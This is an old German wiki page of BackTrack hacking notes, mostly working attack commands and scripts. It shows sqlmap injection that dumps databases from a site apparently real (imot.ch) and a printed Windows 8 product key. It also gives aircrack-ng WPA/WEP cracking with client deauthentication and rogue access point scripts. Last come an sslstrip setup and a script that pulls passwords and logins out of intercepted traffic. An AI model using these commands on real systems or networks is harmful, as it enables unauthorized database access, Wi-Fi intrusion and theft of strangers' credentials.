**Dies ist eine alte Version des Dokuments!**
Inhaltsverzeichnis
BackTrack-Tutorials
BackTrack Testlab einrichten
Quelle 1: Anleitung für Testlab mit Virtualbox
Quelle 2: noch eine Anleitung zu Testlab in Virtualbox
OSX in Virtualbox installieren
Win8 Entwicklerversion installieren
Product Key: TK8TP-9JN6P-7X7WW-RFFTV-B7QPF
mySQL-Injection
los gehts mit öffnem von sqlmap
und jetzt suchen wir nach einer verwundbaren Seite. der code dazu
python sqlmap.py -u http://www.imot.ch/wordpress/?=56 --dbs
wir sehen die Datenbanken (z.B. wordpress)
jetzt gehts um die Inhalte er Datenbank, den Tabellen
python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME --tables
nun sind die Kolonnen dran
python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME -T TABLENAME --columns
jetzt sehen wir den Inhalt der Kolonnen (z.B. pwd, uname)
jetzt wollen wir den Inhalt lesen
python sqlmap.py -u http://sitename.com/index.php?id=444 -D DATENBANKNAME -T TABLENAME -C
WLAN Testen
Tools
crunch Wordlist-Generator
Quelle: adaywithtape - gute Beispiele
Quelle: adaywithtape - aktuelle Version
crunch starten
/pentest/passwords/crunch/crunch 4 4 -o test.txt
generiert eine Liste (test.txt) 4-stellig
Videos und Tutorials
Links
WLAN WPA-Verschlüsselung
Die nachfolgenden Befehle werden mit einem BackTrack5-Live-USB ausgeführt.
aircrack-ng WLAN-Verschlüsselung cracken
mon0 aktivieren
airmon-ng
mit Backtrack5 nicht mehr beachten
sudo service network-manager stop sudo service avahi-daemon stop kill <PID of wpa_supplicant>
mit Backtrack5 nicht mehr beachten (WLAN im Monitor-Modus starten)
airmon-ng start wlan0
Accesspoint und Client suchen
airodump-ng mon0
ESSID BSSID-MAC STATION-MAC CHANNEL speichern
Pakete von Accespoint erfassen
airodump-ng --bssid <BSSID MAC> -w <DATEI> -c <CHANNEL> mon0
in neuer Shell deauthentifizieren den Client für Handshake
aireplay-ng --deauth 10 -a <BSSID 00:00:00:> -c <STATION 00:00:00> mon0
auf erster Shell auf Handshake warten, in erster Zeile ersichtlich
Jetzt cracken wir den Schlüssel
aircrack-ng <DATEINAME> -w <WORDLIST.list>
WLAN für normalen Betrieb aktivieren
ifconfig wlan0 down iwconfig wlan0 mode managed ifconfig wlan0 up
mit Backtrack5 nicht mehr beachten (Dienste für normalen Betrieb wieder starten)
sudo service network-manager start sudo service avahi-daemon start
WLAN WEP-Verschlüsselung
Software installieren
sudo apt-get install aircrack-ng
Schnittstelle erkennen
ifconfig
ergibt wlan0
wlan0 runterfahren
airmon-ng stop wlan0 ifconfig wlan0 stop
wlan0 hochfahren (Monitor-Modus)
airmon-ng start wlan0
Lauschangriff starten (Überblick verschaffen)
airodump-ng wlan0
nach WEP suchen und Channel merken z.B. 6
Daten mitschreiben
airodump-ng -c 6 -w wlan --bssid 00:00:....
Daten sammeln, ca. 250'000
Datei durchsuchen / Passwort knacken
aircrack-ng -b 00:00:..... <DATEI-NAME VON VORHERIGEM PUNKT>
AccessPoint erstellen
Um zu demonstrieren wie gefährlich offene WLAN-AccessPoints sein können.
Links
Traffic von FakeAccessPoint auslesen
Tutorial von Wardriving
dhcpd.conf und iptables sehen interessant aus
Tutorial von 0x80
User mit Metasploit überwachen
Tutorial Rogue AP
Als erstes installieren wir den dhcp Server:
nach dieser Vorlage Fake AP mit Skript
$ apt-get install dhcp3-server -y
Falls noch nicht passiert, sollte ebenfalls aircrack-ng und iptables installiert werden
$ apt-get install aircrack-ng && iptables
Die Serverkonfigurationsdatei bennen wir zwecks Backup um:
$ mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Dann erstellen wir eine neue Serverkonfigurationsdatei:
$ nano /etc/dhcp3/dhcpd.conf
mit folgendem Inhalt:
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
subnet 172.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 172.168.2.255;
option routers 172.168.2.129;
option domain-name-servers 8.8.8.8;
range 172.168.2.130 172.168.2.140;
}
diese Schritte nur zu Beginn ausführen.
Danach mit folgenden zwei Skripten den Fake-AP ein-/ausschalten:
FakeAPstart.sh
#!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan1 # Change to your wlan interface sleep 5; airmon-ng start wlan1 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e SAhotspot -c 6 mon0 & # Change essid, channel and interface sleep 5; ifconfig at0 172.168.2.129 netmask 255.255.255.128 up # Change IP addresses as configured in your dhcpd.conf route add -net 172.168.2.128 netmask 255.255.255.128 gw 172.168.2.129 sleep 5; iptables -F iptables -t nat -F iptables -X iptables -t nat -X iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE # Change wlan0 to your internet facing interface iptables -A FORWARD -i at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
FakeAPstop.sh
#!/bin/sh killall -9 dhcpd3 killall -9 airbase-ng iptables -F iptables -t nat -F iptables -X iptables -t nat -X echo 0 > /proc/sys/net/ipv4/ip_forward airmon-ng stop mon0
Tutorial Rogue AP auslesen
Jetzt wo der Server läuft können wir uns daran machen, den Verkehr auszulesen. Dazu müssen wir als erstes SSLstrip installieren:
$ cd /pentest/web/sslstrip/ $ python setup.py install
Iptables für SSLstrip
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
SSLstrip starten mit folgenden Optionen:
$ sslstrip -a -f -k -w /root/sslstrip.log
diese Datei ist riesig und mit vielen Informationen bestückt. Damit wir nur die relevanten Daten erhalten, bauen wir uns ein Skript mit folgendem Inhalt:
#!/bin/bash
echo "Do you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then
cat /root/sslstrip.log |
awk -F "&" '!/GET/ && !/if/ !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' |
awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user=|username=|login=|credential=|_user|_pwd=|email_address=" |
awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt
if [ -f "/root/filename.pass.txt" ]; then
echo "Passwords saved !"
else echo "Error while saving passwords"
fi
else echo "Password saving skipped."
fi
rm /root/filename.txt
echo -e "\nTemporary files deleted."
Das Skript kann noch angepasst werden. Danach das Skript ausführbar machen:
$ chmod +x Skript.sh
und starten (Abfrage mit „Y“ beantworten.